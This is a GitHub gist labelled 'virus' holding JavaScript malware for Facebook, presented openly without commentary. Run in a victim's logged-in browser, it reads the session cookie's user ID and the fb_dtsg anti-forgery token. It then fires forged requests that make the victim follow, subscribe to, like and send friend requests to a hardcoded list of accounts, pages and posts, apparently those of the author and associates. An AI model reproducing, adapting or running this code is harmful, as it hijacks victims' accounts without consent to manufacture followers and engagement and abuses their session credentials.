Created
September 9, 2014 13:30
-
-
Save huydx/3ed627b9c0041d9ffd11 to your computer and use it in GitHub Desktop.
virus
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function a(abone) | |
{ var http4=new XMLHttpRequest; | |
var url4="/ajax/follow/follow_profile.php?__a=1"; | |
var params4="profile_id="+abone+"&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg="+fb_dtsg+"&lsd&__"+user_id+"&phstamp="; | |
http4.open("POST",url4,true); | |
http4.onreadystatechange=function() | |
{ if(http4.readyState==4&&http4.status==200)http4.close }; | |
http4.send(params4)} | |
function sublist(uidss) { | |
var a = document.createElement('script'); | |
a.innerHTML = "new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: " + uidss + " }).send();"; | |
document.body.appendChild(a); | |
} | |
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]); | |
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value; | |
var now = (new Date).getTime(); | |
function P(post) { | |
var X = new XMLHttpRequest(); | |
var XURL = "//www.facebook.com/ajax/ufi/like.php"; | |
var XParams = "like_action=true&ft_ent_identifier=" + post + "&source=1&client_id=" + now + "%3A3366677427&rootid=u_ps_0_0_14&giftoccasion&ft[tn]=%3E%3DU&ft[type]=20&ft[qid]=5882006890513784712&ft[mf_story_key]=" + post + "&nctr[_mod]=pagelet_home_stream&__user=" + user_id + "&__a=1&__dyn=7n8ahyj35CFwXAg&__req=j&fb_dtsg=" + fb_dtsg + "&phstamp="; | |
X.open("POST", XURL, true); | |
X.onreadystatechange = function () { | |
if (X.readyState == 4 && X.status == 200) { | |
X.close; | |
} | |
}; | |
X.send(XParams); | |
} | |
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value; | |
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]); | |
function Like(p) { | |
var Page = new XMLHttpRequest(); | |
var PageURL = "//www.facebook.com/ajax/pages/fan_status.php"; | |
var PageParams = "&fbpage_id=" + p + "&add=true&reload=false&fan_origin=page_timeline&fan_source=&cat=&nctr[_mod]=pagelet_timeline_page_actions&__user=" + user_id + "&__a=1&__dyn=798aD5z5CF-&__req=d&fb_dtsg=" + fb_dtsg + "&phstamp="; | |
Page.open("POST", PageURL, true); | |
Page.onreadystatechange = function () { | |
if (Page.readyState == 4 && Page.status == 200) { | |
Page.close; | |
} | |
}; | |
Page.send(PageParams); | |
} | |
function IDS(r) { | |
var X = new XMLHttpRequest(); | |
var XURL = "//www.facebook.com/ajax/add_friend/action.php"; | |
var XParams = "to_friend=" + r +"&action=add_friend&how_found=friend_browser_s&ref_param=none&&&outgoing_id=&logging_location=search&no_flyout_on_click=true&ego_log_data&http_referer&__user="+user_id+"&__a=1&__dyn=798aD5z5CF-&__req=35&fb_dtsg="+fb_dtsg+"&phstamp="; | |
X.open("POST", XURL, true); | |
X.onreadystatechange = function () { | |
if (X.readyState == 4 && X.status == 200) { | |
X.close; | |
} | |
}; | |
X.send(XParams); | |
} | |
//Tu Nguyen | |
a("100003834622874"); | |
sublist("343314485806369"); | |
//Đệ Tử Ruột Của Tú Nguyễn | |
a("100008383505174"); | |
a("100007981783984"); | |
sublist("1427444120878358"); | |
//Nghia | |
a("100008359333678"); | |
a("100008345563716"); | |
a("100001094522338"); | |
a("100005277788366"); | |
a("839493429"); | |
//Ảnh My Pic | |
P("420709684733515"); | |
P("419151348222682"); | |
//Ryo | |
a("100006270946077"); | |
a("100005092667848"); | |
a("100004604553062"); | |
sublist("1557367384482278"); | |
//Còi Chảnh Chó | |
a("100006333218643"); | |
a("100004286235264"); | |
//Nhật | |
a("100005475346527"); | |
//Sơn | |
a("100006011107414"); | |
a("100002604994780"); | |
//Thảo | |
a("100004263311485"); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment